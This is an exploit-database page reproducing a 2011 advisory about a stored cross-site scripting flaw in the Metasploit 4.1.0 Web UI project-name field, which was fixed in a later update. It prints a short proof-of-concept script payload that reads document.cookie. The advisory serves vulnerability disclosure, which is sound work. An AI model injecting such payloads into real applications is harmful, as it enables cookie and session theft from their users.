header-logo
Suggest Exploit
vendor:
Metasploit
by:
Stefan Schurtz
7.5
CVSS
HIGH
Stored XSS
79
CWE
Product Name: Metasploit
Affected Version From: Metasploit 4.1.0
Affected Version To: Metasploit 4.1.0
Patch Exists: YES
Related CWE: N/A
CPE: a:rapid7:metasploit:4.1.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2011

Metasploit 4.1.0 Web UI stored XSS vulnerability

Metasploit 4.1.0 Web UI 'project[name]' parameter is prone to a XSS vulnerability. Login to Web UI -> Create New Project -> Project name -> '"</script><script>alert(document.cookie)</script>'

Mitigation:

XSS is fixed in Update 20111020000001
Source

Exploit-DB raw data:

Advisory:              		Metasploit 4.1.0 Web UI stored XSS vulnerability
Advisory ID:           	SSCHADV2011-033
Author:                		Stefan Schurtz
Affected Software:  	Successfully tested on Metasploit Community Edition
Vendor URL:          	http://metasploit.com/
Vendor Status:       	informed

==========================
Vulnerability Description:
==========================

Metasploit 4.1.0 Web UI "project[name]" parameter is prone to a XSS vulnerability

==================
Technical Details:
==================

Login to Web UI -> Create New Project -> Project name -> '"</script><script>alert(document.cookie)</script>

========
Credits:
========

Vulnerability found and advisory written by Stefan Schurtz.

===========
References:
===========

http://metasploit.com/
http://dev.metasploit.com/redmine/issues/5801
http://www.rul3z.de/advisories/SSCHADV2011-033.txt
XSS is fixed in Update 20111020000001